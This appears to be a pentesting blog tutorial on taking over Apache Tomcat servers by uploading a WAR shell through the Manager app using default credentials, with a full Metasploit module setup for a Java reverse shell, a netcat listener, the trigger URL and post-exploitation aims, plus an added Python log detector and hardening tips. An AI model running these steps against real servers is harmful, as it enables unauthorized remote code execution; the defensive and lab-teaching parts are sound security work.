Apache Tomcat Upload Exploitation (Step-by-Step Guide)

🎥 Watch the demonstration here: https://youtu.be/P8nlsRdKzT8

If you’re diving into web exploitation or pentesting Apache Tomcat servers, upload-based exploitation is one of the key techniques to understand. This method targets weak configurations where the Tomcat Manager application allows file uploads (such as WAR files) that are then executed on the server, leading to Remote Code Execution (RCE).

In this blog post, we’ll walk through Apache Tomcat Upload Exploitation with clear steps and explanations. Whether you're learning ethical hacking or creating educational content, this walkthrough is a practical, hands-on example.

🔧 Requirements

  • Kali Linux or any attacker machine

  • Apache Tomcat server (target)

  • Valid Tomcat credentials (default or stolen)

  • Metasploit (optional, but useful)

Step 1: Access the Tomcat Manager Panel

Tomcat’s Manager web interface in this lab runs on:
http://<target-ip>:8180/manager/html
(Port 8180 is what this target uses; a stock Tomcat install listens on 8080 by default.)

If credentials are known (for example tomcat:tomcat, admin:admin, or a pair recovered by brute force), logging into the Manager App section allows you to deploy a new WAR file. This is our entry point to gaining control. Before doing this manually, first run the following from your Kali Linux terminal with root permission.

Step 2: Deploy the Payload with Metasploit (optional)

            msfconsole
            use exploit/multi/http/tomcat_mgr_deploy
            set RHOSTS <target-ip>
            set RPORT 8180
            set TARGETURI /manager
            set HTTPUSERNAME tomcat
            set HTTPPASSWORD tomcat
            set PAYLOAD java/shell_reverse_tcp
            set LHOST <your-ip>
            set LPORT 4444
            exploit

The last line can be either exploit or run; both launch the module.

Step 3: Upload the WAR File via Tomcat Manager

Log into the Tomcat Manager and scroll to the Deploy section.

  • Upload the shell.war file.

  • Click Deploy.

I have demonstrated how to create the WAR file from the Kali Linux terminal in my video, so if you need help you can watch it: How to create a WAR file.

Tomcat unpacks the WAR file and creates a new web application context named after the file, so shell.war becomes http://<target-ip>:8180/shell/.

Step 4: Start a Netcat Listener

On your Kali machine, start a listener:

        nc -lvnp 4444

This opens a port to catch the reverse shell once the payload is executed. Keep this running before triggering the shell.

Step 5: Trigger the Payload

Visit the deployed app’s URL:

        http://<target-ip>:8180/shell/

Once the JSP shell runs, it connects back to your listener, and if that succeeds you now have a reverse shell on the server. The payload is executed on the remote server the moment you request that URL in your browser, so check the link carefully: make sure the IP and port number you typed are correct and that the listener from Step 4 is still running.
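Seen from the defending side, the sequence in Steps 3 to 5 leaves a distinctive trace in Tomcat's access log: a successful upload to the Manager followed by the first request to a context that was not there before. The script below is an added example, not code from the original post; it assumes Tomcat's default access-log pattern and an assumed baseline list of expected contexts, and the log lines are constructed.

```python
import re

# Constructed sample lines in Tomcat's default access-log pattern ("%h %l %u %t "%r" %s %b");
# they are made up for this example and not taken from any real server.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:14:21:58 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - tomcat [10/Oct/2023:14:22:01 +0000] "GET /manager/html HTTP/1.1" 200 19845
192.0.2.10 - tomcat [10/Oct/2023:14:22:07 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCDEF HTTP/1.1" 200 20311
192.0.2.10 - - [10/Oct/2023:14:22:15 +0000] "GET /shell/ HTTP/1.1" 200 0
198.51.100.7 - - [10/Oct/2023:14:23:00 +0000] "GET /docs/index.html HTTP/1.1" 200 8812
"""

# Contexts known to exist before monitoring started (assumed baseline for this example).
BASELINE_CONTEXTS = {"ROOT", "manager", "host-manager", "docs", "examples"}

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Manager endpoints that create a new web application: the HTML upload form and the
# text/legacy deploy commands.
DEPLOY_RE = re.compile(r"^/manager/(html/upload|text/deploy|deploy)(\?|$)")


def context_of(path):
    """Top-level context of a request path: '/shell/x.jsp' -> 'shell', '/' -> 'ROOT'."""
    first = path.split("?", 1)[0].split("/")[1] if "/" in path else ""
    return first or "ROOT"


def find_deploy_alerts(log_text, baseline=BASELINE_CONTEXTS):
    """Return (alert_type, ip, user, detail) tuples for every successful POST/PUT to a
    manager deploy endpoint, and for the first request to each context outside the
    baseline that is made after such a deployment (the new app being triggered)."""
    alerts, deployed, seen = [], False, set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # a line in another format is skipped rather than guessed at
        ip, user, method, path, status = (m.group(k) for k in ("ip", "user", "method", "path", "status"))
        ctx = context_of(path)
        if DEPLOY_RE.match(path) and method in ("POST", "PUT") and int(status) < 400:
            alerts.append(("manager-deploy", ip, user, path.split("?", 1)[0]))
            deployed = True
        elif deployed and ctx not in baseline and ctx not in seen:
            seen.add(ctx)
            alerts.append(("new-context-hit", ip, user, "/" + ctx + "/"))
    return alerts
```

Restricting the Manager app to trusted source addresses (for example with Tomcat's RemoteAddrValve) and removing default credentials closes the entry point this walkthrough relies on.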

Step 6: Post-Exploitation

Once in, you can:

  • Enumerate the server

  • Escalate privileges

  • Pivot further inside the network

But remember, this technique is only to be used in authorized environments like labs or client-approved engagements. All of these techniques are briefly demonstrated in my video, so if you don't understand this topic you can watch it: https://youtu.be/P8nlsRdKzT8

If you don't understand anything in this content, please let me know, and if you found it helpful, subscribe to my YouTube channel.
